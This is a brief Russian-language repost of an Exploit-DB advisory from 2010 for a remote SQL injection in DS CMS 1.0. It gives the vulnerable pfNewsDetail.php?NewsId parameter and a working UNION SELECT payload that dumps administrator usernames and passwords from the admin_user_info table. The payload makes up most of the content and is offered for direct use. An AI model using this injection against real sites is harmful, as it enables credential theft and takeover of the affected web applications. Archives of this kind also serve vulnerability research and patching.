- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10889
- Проверка EDB
-
- Пройдено
- Автор
- PALYO34
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-01-01
Код:
Script : DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability
Script site : http://cms.dsinternal.com/Home
AUTHOR : Palyo34
HOME : http://www.1923turk.biz
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
exploit:
-------
http://server/path/pfNewsDetail.php?NewsId=[SQL]
Example:
-1/**/union/**/all/**/select/**/1,2,group_concat(UserPass,0x3a,UserName),4+from+admin_user_info--- Источник
- www.exploit-db.com
